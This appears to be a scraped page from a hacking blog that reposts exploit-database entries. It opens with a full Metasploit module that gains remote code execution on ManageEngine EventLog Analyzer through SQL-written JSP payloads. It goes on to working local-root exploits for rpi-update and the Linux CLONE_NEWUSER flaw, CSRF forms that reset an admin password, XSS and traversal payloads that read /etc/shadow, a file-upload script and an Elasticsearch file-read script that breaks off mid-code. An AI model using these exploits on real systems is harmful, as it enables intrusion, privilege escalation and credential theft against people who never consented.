##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'ManageEngine EventLog Analyzer Remote Code Execution',
'Description' => %q{
This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6
build 10060 and previous versions. Every authenticated user, including the default "guest"
account can execute SQL queries directly on the underlying Postgres database server. The
queries are executed as the "postgres" user which has full privileges and thus is able to
write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM
privileges on the web server. This module has been tested successfully on ManageEngine
EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
],
'References' =>
[
['EDB', '38173']
],
'Platform' => ['win'],
'Arch' => ARCH_X86,
'Targets' =>
[
['ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Jul 11 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8400),
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ])
], self.class)
end
def uri
target_uri.path
end
def check
# Check version
vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'event', 'index3.do')
})
if res && res.code == 200 && res.body && res.body.include?('ManageEngine EventLog Analyzer')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def sql_query(cookies, query)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'event', 'runQuery.do'),
'cookie' => cookies,
'vars_post' => {
'execute' => 'true',
'query' => query,
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Failed executing SQL query!")
end
res
end
def generate_jsp_payload(cmd)
decoder = rand_text_alpha(4 + rand(32 - 4))
decoded_bytes = rand_text_alpha(4 + rand(32 - 4))
cmd_array = rand_text_alpha(4 + rand(32 - 4))
jsp_code = '<%'
jsp_code << "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
jsp_code << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
jsp_code << "String [] #{cmd_array} = new String[3];\n"
jsp_code << "#{cmd_array}[0] = \"cmd.exe\";\n"
jsp_code << "#{cmd_array}[1] = \"/c\";\n"
jsp_code << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
jsp_code << "Runtime.getRuntime().exec(#{cmd_array});\n"
jsp_code << '%>'
jsp_code
end
def exploit
print_status("#{peer} - Retrieving JSESSION ID")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'event', 'index3.do'),
})
if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/
jsessionid = $1
print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]")
else
fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!")
end
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"),
'vars_post' => {
'forChecking' => 'null',
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'domains' => "Local Authentication\r\n",
'loginButton' => 'Login',
'optionValue' => 'hide'
}
})
if res && res.code == 302
redirect = URI(res.headers['Location'])
print_status("#{peer} - Location is [ #{redirect} ]")
else
fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => "#{redirect}",
'method' => 'GET'
})
if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/
cookies = res.get_cookies
print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]")
else
fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!")
end
jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'
cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '')
print_status("#{peer} - Executing SQL queries")
# Remove large object in database, just in case it exists from previous exploit attempts
sql = 'SELECT lo_unlink(-1)'
result = sql_query(cookies, sql)
# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
sql = 'SELECT lo_create(-1)'
result = sql_query(cookies, sql)
if result.body =~ /menuItemRow\">([0-9]+)/
loid = $1
else
fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
end
select_random = rand_text_numeric(2 + rand(6 - 2))
# Insert JSP payload into the pg_largeobject table. We have to use "SELECT" first to to bypass OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc.
sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--"
result = sql_query(cookies, sql)
# Export our large object id data into a WAR file
sql = "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');"
sql_query(cookies, sql)
# Remove our large object in the database
sql = 'SELECT lo_unlink(-1)'
result = sql_query(cookies, sql)
register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}")
print_status("#{peer} - Executing JSP payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, jsp_name),
})
# If the server returns 200 we assume we uploaded and executed the payload file successfully
unless res && res.code == 200
print_status("#{res.code}\n#{res.body}")
fail_with(Failure::Unknown, "#{peer} - Payload not executed, aborting!")
end
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863529577
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/58271/info
Plogger is prone to following input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data:
1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities
3. A cross-site request forgery vulnerability
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in context of the affected site, steal cookie-based authentication credentials, access or modify data, exploit latent vulnerabilities in the underlying database, and perform certain unauthorized actions; other attacks are also possible.
Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.
+---+[ Feedback.php Sqli ]+---+
Injectable On entries_per_pag Parameter In Feedback.php
http://www.example.com/plogger/plog-admin/plog-feedback.php?entries_per_page=5'
p0c
if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.
// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);
+---+[ CSRF In Admin Panel ]+---+
Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..
+---+[ XSS ]+---+
Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..
XSS
http://www.example.com/plogger/plog-admin/plog-feedback.php
Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.
Uploading the File and enter name to any XSS Vector..
http://www.example.com/plogger/plog-admin/plog-upload.php
It Can Me Exploit IN Many Ways LIke
CSRF + SQLI inside Admin panel..which Is define above.
XSS In Edit Comment.CSRF + XSS
<html>
<head>
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@www.example.com.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
Another XSS
http://www.example.com/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit Caption To XSS Vector Inside Admin PAnel..
Again CSRF + XSS
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
CSRF Admin Password Reset And XSS
plog-options.php
<form action="http://www.example.com/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="www.example.com@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>
source: https://www.securityfocus.com/bid/58285/info
The Uploader Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Uploader 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E
source: https://www.securityfocus.com/bid/58290/info
Foscam is prone to a directory-traversal vulnerability.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.
GET //../proc/kcore HTTP/1.0
// source: https://www.securityfocus.com/bid/58292/info
rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability
An attacker can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application, bypass certain security restrictions, and perform unauthorized actions. This may aid in further attacks.
/*Local root exploit for rpi-update on raspberry Pi.
Vulnerability discovered by Technion, technion@lolware.net
https://github.com/Hexxeh/rpi-update/
larry@pih0le:~$ ./rpix updateScript.sh
[*] Launching attack against "updateScript.sh"
[+] Creating evil script (/tmp/evil)
[+] Creating target file (/usr/bin/touch /tmp/updateScript.sh)
[+] Initialize inotify on /tmp/updateScript.sh
[+] Waiting for root to change perms on "updateScript.sh"
[+] Opening root shell (/tmp/sh)
# <-- Yay!
Larry W. Cashdollar
http://vapid.dhs.org
@_larry0
Greets to Vladz.
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>
/*Create a small c program to pop us a root shell*/
int create_nasty_shell(char *file) {
char *s = "#!/bin/bash\n"
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
"cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
"chmod 4755 /tmp/sh;\n";
int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
write(fd, s, strlen(s));
close(fd);
return 0;
}
int main(int argc, char **argv) {
int fd, wd;
char buf[1], *targetpath, *cmd,
*evilsh = "/tmp/evil", *trash = "/tmp/trash";
if (argc < 2) {
printf("Usage: %s <target file> \n", argv[0]);
return 1;
}
printf("[*] Launching attack against \"%s\"\n", argv[1]);
printf("[+] Creating evil script (/tmp/evil)\n");
create_nasty_shell(evilsh);
targetpath = malloc(sizeof(argv[1]) + 32);
cmd = malloc(sizeof(char) * 32);
sprintf(targetpath, "/tmp/%s", argv[1]);
sprintf(cmd,"/usr/bin/touch %s",targetpath);
printf("[+] Creating target file (%s)\n",cmd);
system(cmd);
printf("[+] Initialize inotify on %s\n",targetpath);
fd = inotify_init();
wd = inotify_add_watch(fd, targetpath, IN_MODIFY);
printf("[+] Waiting for root to modify :\"%s\"\n", argv[1]);
syscall(SYS_read, fd, buf, 1);
syscall(SYS_rename, targetpath, trash);
syscall(SYS_rename, evilsh, targetpath);
inotify_rm_watch(fd, wd);
printf("[+] Opening root shell (/tmp/sh)\n");
sleep(2);
system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
return 0;
}
source: https://www.securityfocus.com/bid/58293/info
HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
HP Intelligent Management Center 5.1 E0202 is vulnerable; other versions may also be affected.
http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3 &topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null &topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null
source: https://www.securityfocus.com/bid/58418/info
Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/public/error.php?warning=<XSS injection>
source: https://www.securityfocus.com/bid/58508/info
Petite Annonce is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/annonce/moteur-prix.php?categoriemoteur=1"><script>alert(31337);</script>
source: https://www.securityfocus.com/bid/58476/info
Cisco Video Surveillance Operations Manager is prone to multiple security vulnerabilities, including:
1. Multiple local file-include vulnerabilities
2. A security-bypass vulnerability
3. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to bypass certain security restrictions to perform unauthorized actions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
Cisco Video Surveillance Operations Manager 6.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script>
/*
source: https://www.securityfocus.com/bid/58478/info
Linux kernel is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain kernel privileges, which will aid in further attacks.
*/
/* clown-newuser.c -- CLONE_NEWUSER kernel root PoC
*
* Dedicated to: Locke Locke Locke Locke Locke Locke Locke!
*
* This exploit was made on the 13.3.13.
*
* (C) 2013 Sebastian Krahmer
*
* We are so 90's, but we do 2013 xSports.
*
* Must be compiled static:
*
* stealth@linux-czfh:~> cc -Wall clown-newuser.c -static
* stealth@linux-czfh:~> ./a.out
* [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer
*
* [+] Found myself: '/home/stealth/a.out'
* [*] Parent waiting for boomsh to appear ...
* [*] Setting up chroot ...
* [+] Done.
* [*] Cloning evil child ...
* [+] Done.
* [*] Creating UID mapping ...
* [+] Done.
* [+] Yay! euid=0 uid=1000
* linux-czfh:/home/stealth # grep bin /etc/shadow
* bin:*:15288::::::
* linux-czfh:/home/stealth #
*
*/
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
int go[2];
char child_stack[1<<20];
extern char **environ;
void die(const char *msg)
{
perror(msg);
exit(errno);
}
int child(void *arg)
{
char c;
close(go[1]);
read(go[0], &c, 1);
setuid(0);
/* this will also affect the parent, but the parent
* has the init_user_ns, so it will start suid with real uid 0.
*/
if (chdir("chroot") < 0)
die("[-] chdir");
if (chroot(".") < 0)
die("[-] chroot");
return 0;
}
int setup_chroot(const char *me)
{
mkdir("chroot", 0755);
mkdir("chroot/lib64", 0755);
mkdir("chroot/bin", 0755);
if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0)
die("[-] link");
if (link("/bin/su", "chroot/bin/su") < 0)
die("[-] link");
return 0;
}
int main(int argc, char *argv[])
{
char *su[] = {"/bin/su", NULL};
char *sh[] = {"/bin/bash", NULL};
char me[256], *mee[] = {me, "1", NULL};
char uidmap[128], map_file[128];
pid_t pid;
struct stat st;
int fd;
if (geteuid() == 0 && argc == 1) {
/* this will run inside chroot, started as the ld.so from
* su process
*/
printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid());
chown("lib64/ld-linux-x86-64.so.2", 0, 0);
chmod("lib64/ld-linux-x86-64.so.2", 04755);
exit(0);
} else if (geteuid() == 0) {
/* this will run outside */
setuid(0);
execve(*sh, sh, environ);
die("[-] execve");
}
printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n");
memset(me, 0, sizeof(me));
readlink("/proc/self/exe", me, sizeof(me) - 1);
printf("[+] Found myself: '%s'\n", me);
if (fork() > 0) {
printf("[*] Parent waiting for boomsh to appear ...\n");
for (;;) {
stat(me, &st);
if (st.st_uid == 0)
break;
usleep(1000);
}
execve(me, mee, environ);
die("[-] execve");
}
printf("[*] Setting up chroot ...\n");
setup_chroot(me);
printf("[+] Done.\n[*] Cloning evil child ...\n");
if (pipe(go) < 0)
die("[-] pipe");
pid = clone(child, child_stack + sizeof(child_stack),
CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL);
if (pid == -1)
die("[-] clone");
printf("[+] Done.\n[*] Creating UID mapping ...\n");
snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid);
if ((fd = open(map_file, O_RDWR)) < 0)
die("[-] open");
snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid());
if (write(fd, uidmap, strlen(uidmap)) < 0)
die("[-] write");
close(fd);
printf("[+] Done.\n");
close(go[0]);
write(go[1], "X", 1);
waitpid(pid, NULL, 0);
execve(*su, su, NULL);
die("[-] execve");
return -1;
}
source: https://www.securityfocus.com/bid/58463/info
QlikView is prone to a remote integer-overflow vulnerability.
Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
QlikView 11.00 SR2 is vulnerable; other versions may also be affected.
Vulnerability details:
----------------------
The .qvw file is divided into several sections with a specified delimiter.
Among others, there is a parameter which is responsible for defining the
section length. On the hex listing below it's the DWORD A4 00 00 00 (address
315EF)
000315B0: 00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23
000315C0: 23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00
000315D0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03
000315E0: 00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4
000315F0: 00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47
If by any reasons the value is bigger than the actual size of the section,
an error is handled by a C++ EH and a message "Document failed to load" is
shown. The check condition can be seen here:
.text:00D6BD66 mov eax, [edi+28h]
.text:00D6BD69 mov ebx, [eax] ; here is the length parameter
.text:00D6BD6B add eax, 4
.text:00D6BD6E mov [edi+28h], eax
.text:00D6BD71 cmp ebx, [ebp+var_14]
.text:00D6BD74 jg loc_D6BBAC ; check if the parameter value
is bigger than actual length
However, the comparison operates with a signed number and doesn't check if it's
less than zero. In other words, if an attacker supplies a DWORD bigger than
0x80000000, the jump will not be taken (as the number will be considered as
negative), causing an integer overflow. After that, the length parameter is used
as the DstSize argument to the CArchive::Read function:
.text:00D6BD7A mov eax, [ebp+Dst]
.text:00D6BD7D push ebx ; DstSize
.text:00D6BD7E push eax ; Dst
.text:00D6BD7F mov ecx, edi
.text:00D6BD81 call ?Read () CArchive@@QAEIPAXI () Z ; CArchive::Read(void *,uint)
A large amount of data is read. It is used later to fill the created Archive
whose size is 0x8000:
.text:00B26207 push 0
.text:00B26209 push 8000h
.text:00B2620E push 1
.text:00B26210 lea eax, [ebp+var_60]
.text:00B26213 push eax
.text:00B26214 lea ecx, [ebp+var_A8]
.text:00B2621A call ??0CArchive@@QAE () PAVCFile@@IHPAX () Z ;
CArchive::CArchive(CFile *,uint,int,void *)
This results in the controlled address being overwritten with the controlled
value.
.text:009F3092 mov ecx, [esi]
.text:009F3094 mov edx, [esi+4]
.text:009F3097 mov [ecx+4], edx ; here the error occurs;
.text:009F3097 ; trying to write at non-existing address
An extract from a debugger with the occurence of the error is presented below.
eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10
eip=01723097 esp=003527f8 ebp=00352818 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
Qv+0x5f3097:
01723097 895104 mov dword ptr [ecx+4],edx ds:002b:bbbbbbbb=????????
source: https://www.securityfocus.com/bid/58450/info
fastreader is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
fastreader 1.0.8 is affected; other versions may also be vulnerable.
The following example URI is available:
http://www.g;id;.com
source: https://www.securityfocus.com/bid/58432/info
PHPBoost is prone to an information disclosure vulnerability and an arbitrary file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit these issues to upload arbitrary files in the context of the web server process or gain access to sensitive information that may aid in further attacks.
PHPBoost 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/phpboost/user/?url=/../../KedAns
Source: https://code.google.com/p/google-security-research/issues/detail?id=546
Avast will render the commonName of X.509 certificates into an HTMLLayout frame when your MITM proxy detects a bad signature. Unbelievably, this means CN="<h1>really?!?!?</h1>" actually works, and is pretty simple to convert into remote code execution.
To verify this bug, I've attached a demo certificate for you. Please find attached key.pem, cert.pem and cert.der. Run this command to serve it from a machine with openssl:
$ sudo openssl s_server -key key.pem -cert cert.pem -accept 443
Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38384.zip
source: https://www.securityfocus.com/bid/58431/info
KindEditor is prone to multiple remote file-upload vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
KindEditor 4.1.5 is vulnerable; other versions may also be affected.
<?php
$uploadfile="KedAns.txt";
$ch = curl_init("http://www.example.com/kindeditor/php/upload_json.php?dir=file");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('imgFile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :
--------------------------------------------------
<html><head>
<title>Uploader By KedAns-Dz</title>
<script src="http://www.example.com/kindeditor/kindeditor-min.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://www.example.com/kindeditor/php/upload_json.asp?dir=file',
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>
# elasticpwn Script for ElasticSearch url path traversal vuln. CVE-2015-5531
```
[crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
!dSR script for CVE-2015-5531
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
The script requires path.repo to be set into elasticsearch.yml and be writeable by elasticsearch process.
In order to bypass the snapshot- prefix setted in the server side, we need to create a known relative path:
curl http://exploitlab.int:9200/_snapshot/?pretty
{
"pwn" : {
"type" : "fs",
"settings" : {
"location" : "dsr"
}
},
"pwnie" : {
"type" : "fs",
"settings" : {
"location" : "dsr/snapshot-ev1l"
}
}
}
We will use it later to access through path traversal url:
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
The file content it's represented as an array of ints, that needs to be translated into human readable:
crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
!dSR script for CVE-2015-5531
{u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
There is also a path disclosure that could help exploiting in some scenarios:
crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
!dSR script for CVE-2015-5531
{"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
```
#!/usr/bin/env python
# PoC for CVE-2015-5531 - Reported by Benjamin Smith
# Affects ElasticSearch 1.6.0 and prior
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
# Tested on default Linux (.deb) install || requires path.repo: to be set on config file
import urllib, urllib2, json, sys, re
print "!dSR script for CVE-2015-5531\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
host = sys.argv[1]
fpath = urllib.quote(sys.argv[2], safe='')
port = 9200
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
reponame = 'pwn'
baseurl = "http://%s:%s/_snapshot/" % (host, port)
xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)
def createSnapdirs():
try:
url = "%s/%s" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
url = "%s/%sie" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
except urllib2.HTTPError, e:
data = json.load(e)
print "[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n"
print str(data['error'])
sys.exit()
def grabFile(xplurl):
try:
urllib2.urlopen(xplurl)
except urllib2.HTTPError, e:
data = json.load(e)
extrdata = re.findall(r'\d+', str(data['error']))
decoder = bytearray()
